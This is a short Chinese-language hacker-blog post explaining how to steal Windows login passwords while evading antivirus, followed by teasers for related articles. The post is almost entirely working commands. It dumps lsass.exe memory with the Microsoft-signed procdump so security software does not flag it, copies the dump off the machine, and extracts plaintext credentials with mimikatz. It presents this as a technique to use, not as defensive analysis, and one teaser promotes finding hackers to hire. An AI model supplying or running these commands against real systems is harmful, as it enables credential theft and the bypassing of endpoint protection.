绕过杀毒软件抓取windows密码

hacker5年前黑客文章805

 使用procdump,由于是微软的东西,带微软签名杀软不会报毒。

procdump -accepteula -ma lsass.exe lsass.dmp

copy出 lsass.dmp到本机。


mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP
mimikatz # sekurlsa::logonPasswords

具体可以参考原文:

http://blog.gentilkiwi.com/securite/mimikatz/minidump


标签: 黑客技术

相关文章

Stunnel应用OpenSSL库开展数据加密

Stunnel应用OpenSSL库开展数据加密

什么叫Stunnel? 此专用工具致力于做为虚拟服务器和远程控制手机客户端中间的SSL数据加密包裝。要是工程建筑全过程合乎其安全设置,Stunnel能够从FIPS 140-2认证OpenSSL FI...

简易网络嗅探器的实现

简易网络嗅探器的实现

本文介绍一个用C语言和网络数据包分析开发工具实现的简易网络Sniffer。目前,已经有不少的Sniff工具软件,如Windows环境下,最富盛名的工具是Netxray和Sniffer pro,用它们在...

Argus是啥?

Argus是啥?

Argus是啥? Argus可用以协助适用网络信息安全管理方法和互联网调查取证。根据恰当的对策,克罗地亚数据信息能够 被采掘,以明确您是不是古代历史遭受侵入或进攻,在公布进攻并明确了让步指标值(IO...

Nagios是不是适用全部电脑操作系统?

Nagios是不是适用全部电脑操作系统?

什么叫Nagios? Nagios是一个互联网和监视系统程序运行。它监控您特定的服务项目和服务器,当事儿受到影响或事儿越来越更强时友情提示。Nagios的很多作用包含:监控器全部IT系统架构,马上了...

谁能找到免费黑客人员联系方式?求告知黑客联系方式

在一些好莱坞电影中,我们经常看到超级黑客在电脑前“侵入”别人的安全系统。你能熟练、轻松地输入很多复杂的代码,而且不会一下子全部入侵/破解,这是不是令人羡慕?事实上,我们也可以像电影和游戏中的黑客一样攻...

AppScan是不是适用全部电脑操作系统?

AppScan是不是适用全部电脑操作系统?

什么是AppScan? AppScan在全部运用软件开发生命期中开展安全性测试,在设计阶段初期出示安全系数确保,并开展简单化单元测试卷。该专用工具能够扫描仪很多普遍的系统漏洞,比如HTTP回应切分,...